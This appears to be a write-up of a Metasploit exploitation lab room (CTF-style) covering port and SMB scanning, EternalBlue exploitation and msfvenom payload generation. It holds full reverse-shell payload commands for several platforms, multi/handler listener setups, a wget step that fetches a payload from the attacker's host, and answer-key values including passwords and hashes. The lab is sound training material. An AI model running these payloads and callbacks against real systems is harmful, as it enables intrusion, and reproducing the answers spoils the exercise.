Tasks

Task 1 — Introduction

This is the follow-up room to the Metasploit introduction. If the last room was about getting comfortable with how Metasploit is structured, this one is where you start doing things with it. Real scanning, exploitation, payloads.

The topics this room covers: Scanning target systems using Metasploit, using the Metasploit database feature to keep things organized, vulnerability scanning, exploiting vulnerable services, and using msfvenom to generate payloads and get a Meterpreter session going.

One thing to note before starting: any task in this room that needs a wordlist uses this one specifically:

/usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt

If you’re on the AttackBox it’s already there. If you’re on your own machine, download it from the task files. Don’t forget this or you’ll waste time wondering why your brute force isn’t finding anything.

Task 2 — Scanning

So Metasploit isn’t just for exploitation. It has a bunch of scanning modules too. You can find the port scanning ones by running:

search portscan

That’ll give you a list including things like TCP SYN scanner, ACK firewall scanner, FTP bounce scanner, and a few others. They’re all auxiliary modules under auxiliary/scanner/portscan/.

To use one, you pick it with use, then check its options with show options. The main things you’ll be setting are:

Worth knowing: the PORTS default of 1-10000 here is not the same as what Nmap does by default. Nmap scans the top 1000 most common ports, which is not necessarily port numbers 1 through 1000. Metasploit just literally scans 1 to 10000 in order. Different thing.

That said, you can also just run Nmap directly from inside msfconsole. Just type nmap followed by your flags and target and it hands it off to the system. Handy so you don’t have to switch between windows.

UDP scanning

There’s a module called scanner/discovery/udp_sweep that quickly checks for common UDP services. It won’t find everything but it can pick up things like DNS and NetBIOS fast. Good for a quick first pass.

SMB scanning

Metasploit has some really solid SMB-focused scanners. smb_version will tell you what Windows version is running on the target. smb_enumshares will list out any shared folders. These are genuinely useful in a corporate environment where there are loads of Windows machines sitting around.

On that note, NetBIOS is worth paying attention to. It’s an older protocol but it’s still everywhere on Windows networks. The NetBIOS name of a machine can tell you a lot about what it is. Something named CORP-DC is probably a domain controller. Something named DEVOPS is probably something you want to poke at. And sometimes these machines have shared folders accessible without any password at all, or with something embarrassingly simple like “admin” or “root.”

The general idea is: the more you know about what’s running on the target, the more options Metasploit gives you. Scanning properly before jumping into exploitation makes the whole process a lot smoother.

Question: How many ports are open on the target system? 5

Question: Using the relevant scanner, what NetBIOS name can you see? ACME IT SUPPORT

Question: What is running on port 8000? webfs/1.21

Question: What is the “penny” user’s SMB password? leo1234

Task 3 — The Metasploit Database

This task is less about hacking things and more about staying organized. When you’re only dealing with one target it feels like overkill. When you’ve got 30 machines in scope it becomes genuinely necessary.

Metasploit can connect to a PostgreSQL database to store all your scan results, hosts, services, and vulnerabilities. On the AttackBox this is already set up. If you’re on your own Kali install you’ll need to do a bit of setup first:

  1. Start PostgreSQL: systemctl start postgresql
  2. Initialize the Metasploit database: sudo -u postgres msfdb init

Note: running msfdb init as root throws an error. You have to run it as the postgres user with sudo. It’s one of those things that’ll catch you out the first time.

Once that’s done, launch msfconsole and check it’s working:

db_status

You should see something like Connected to msf. Connection type: postgresql. If you see an error instead, something went wrong with the setup.

Workspaces

The database lets you create separate workspaces for different engagements. That way your scan data from one client doesn’t get mixed in with another. You manage them with the workspace command:

Scanning into the database

Instead of regular nmap, use db_nmap. It runs the exact same scan but automatically saves everything to the database:

db_nmap -sV -p- 10.10.12.229

After that you can use hosts to see all the machines you’ve scanned and services to see all the services that were found. The services command also supports searching with -S, so something like services -S netbios will only show you NetBIOS-related services. Really useful when you’ve got a big list and you’re looking for something specific.

Setting RHOSTS from the database

Once you’ve got hosts in the database you can do hosts -R while inside a module context and it’ll automatically set RHOSTS to all the hosts stored. If you’ve scanned a whole subnet and want to run the same module against everything you found, you don’t have to type out every IP. One command and it populates the whole list.

The example workflow the room gives is a good one to understand:

  1. Scan the network with db_nmap
  2. Use hosts -R to populate RHOSTS automatically
  3. Run a vulnerability scanner like auxiliary/scanner/smb/smb_ms17_010 against everything at once
  4. Check results, pick your targets

When looking for things to attack, the room suggests keeping an eye out for:

HTTP services that might have web app vulnerabilities like SQL injection or RCE

FTP that might allow anonymous login

SMB that might be vulnerable to something like MS17-010

SSH with weak or default credentials

RDP with weak passwords or known CVEs like BlueKeep

Task 4 — Vulnerability Scanning

So “low hanging fruit” is the phrase that comes up here. It means vulnerabilities that are easy to find and easy to exploit. They won’t always exist, but when they do you want to find them fast.

Metasploit’s scanner modules are really good for this. The better you are at the scanning and fingerprinting phase the more you get out of Metasploit. If you find that a target is running VNC for example, you can search for VNC modules:

use auxiliary/scanner/vnc/

Tab completion gives you the options: ard_root_pw, vnc_login, vnc_none_auth. The vnc_login one is a credential brute forcer. The vnc_none_auth one checks if VNC is set up with no authentication at all, which happens more than you’d think.

Running info on any module before you use it is a good habit. It’ll show you who wrote it, what CVEs it covers, what all the options actually mean, and sometimes warnings about things that could go wrong. Worth a read especially on anything that says it might crash the target.

The SMTP open relay check is another example. An open relay means the mail server will forward emails for anyone without authentication. That’s bad because it can be used to send spam or phishing emails that look like they came from a legitimate server. Metasploit has a module for checking this.

Question: Who wrote the module that allows us to check SMTP servers for open relay? Campbell Murray

You find this by loading the module and running info. The “Provided by” section at the top tells you.

Task 5 — Exploitation

This is the part everyone’s here for. Metasploit has over 2000 exploits covering basically every major OS and platform. The basic workflow is always the same: search for the exploit, select it, set your options, run it.

One thing that’s easy to forget is that you can change the payload after selecting an exploit. The default is fine a lot of the time but show payloads will list every compatible payload for that exploit. You pick one with set payload followed by the number or full name. Different payloads have different requirements too, so after switching payload always run show options again to see if any new parameters appeared. A reverse payload for example will always need LHOST set to your attacking machine’s IP.

The room demonstrates exploitation using MS17-010 EternalBlue against a Windows 7 target. The module is exploit/windows/smb/ms17_010_eternalblue. You set RHOSTS to the target IP, LHOST to your own IP, and fire it. When it works you get dropped into a shell on the target.

Something to know going in: picking the right payload is sometimes trial and error. Firewalls, antivirus, what interpreters are installed on the target, whether certain programs exist, all of it can affect whether a payload actually works. If one fails, try another. It’s not always clean on the first go.

Once you have a shell you can background it with CTRL+Z. It’ll ask you to confirm and then you’re back at the module prompt with the session saved. sessions shows you everything that’s open. sessions -i 1 drops you back into session 1. sessions -K kills everything if you need to clean up.

The -z flag on exploit -z is also useful. It runs the exploit and immediately backgrounds the session when it opens so you don’t get dropped into it. Good when you’re chaining multiple exploits or opening sessions on several targets quickly.

For the target in this task the exploit to go for is EternalBlue. Once you’re in, poke around for the flag.

Question: What is the content of the flag.txt file? THM-5455554845

Question: What is the NTLM hash of the password of the user “pirate”? 8ce9a3ebd1647fcc5e04025019f4b875

Task 6 — Msfvenom

msfvenom is a standalone tool that ships with Metasploit. It replaced two older tools called Msfpayload and Msfencode and does what both of them did. You use it to generate payloads as files you can drop onto a target.

The basic format is:

msfvenom -p [payload] LHOST=[your IP] LPORT=[your port] -f [format] > [output file]

You can list every available payload with msfvenom -l payloads. It’s a long list. Android, iOS, Windows, Linux, PHP, Python, it’s all there.

Output formats

msfvenom --list formats shows you everything it can output. The ones you’ll use most often are:

Encoders

The room is honest about this and it’s worth repeating: encoders don’t really bypass modern antivirus. They encode the payload (the PHP base64 example in the room is a good illustration of what the output looks like) but AV these days does a lot more than just signature matching. If bypassing AV is the goal, you need proper obfuscation techniques or shellcode injection methods, not just -e php/base64. Don’t go into this thinking encoding is a magic trick.

The PHP file thing

One gotcha the room flags: when you generate a PHP payload with msfvenom and output it as raw, the resulting file is missing the opening PHP tag and the closing ?> tag. You have to add them manually before the file will actually execute as PHP.

Handling incoming connections with multi/handler

When you generate a standalone payload and somehow get it onto a target (file upload vulnerability, social engineering, whatever), you need something listening on your end to catch the connection when it calls back. That’s what exploit/multi/handler is for.

It supports every Metasploit payload. You just set it to the same payload, LHOST, and LPORT you used in msfvenom and run it. It sits there and waits. When the payload executes on the target the connection comes in and you get your shell or Meterpreter session.

Setup looks like this:

use exploit/multi/handler
set payload php/reverse_php
set lhost [your IP]
set lport 7777
run

Then you trigger the payload on the target and the session opens up on your end.

Common payload commands by platform:

Linux ELF:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Windows EXE:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python:

msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

All of these are reverse payloads so they all need multi/handler running with matching settings on your side.

For the practical part of this task:

The target machine credentials are murphy / 1q2w3e4r. You can SSH in or use the browser terminal. Once in, run sudo su to get a root shell.

Then on your attacking machine generate the payload:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[your IP] LPORT=4444 -f elf > shell.elf

Host it with a quick Python web server:

python3 -m http.server 9000

On the target machine download it:

wget http://[your IP]:9000/shell.elf
chmod +x shell.elf

Back on your attacking machine, set up multi/handler before you run the payload:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost [your IP]
set lport 4444
run

Then on the target run ./shell.elf and your Meterpreter session opens up.

Question: What is the other user’s password hash? $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

Task 7 — Summary

That’s the exploitation room done. It covered a lot more ground than the intro room.

The database stuff is easy to skip over when you’re just doing single-target CTF rooms but it’s useful to understand. Real engagements have scope, multiple machines, and you need to track what you’ve found. Workspaces and db_nmap make that manageable.

The msfvenom section is probably the most practically useful bit if you’re heading toward more advanced stuff. Being able to generate a payload in whatever format you need and catch the callback with multi/handler is a nice skill. The PHP file gotcha with the missing tags is the kind of thing that’ll waste 20 minutes of your life the first time you hit it so at least now you know.

Next up is the Meterpreter room where post-exploitation gets properly covered. That’s where things start getting really interesting.

On to the next one.